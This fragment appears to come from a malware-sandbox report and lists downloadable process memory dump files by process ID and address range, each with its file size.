7.0MB

Download
memory/2512-90-0x0000000003DE0000-0x00000000044E2000-memory.dmp

Filesize
7.0MB

Download
memory/2512-62-0x0000000003DE0000-0x00000000044E2000-memory.dmp

Filesize
7.0MB

Download
memory/2872-114-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/2872-116-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/2872-124-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/2948-93-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/2948-115-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/2948-117-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/2948-125-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download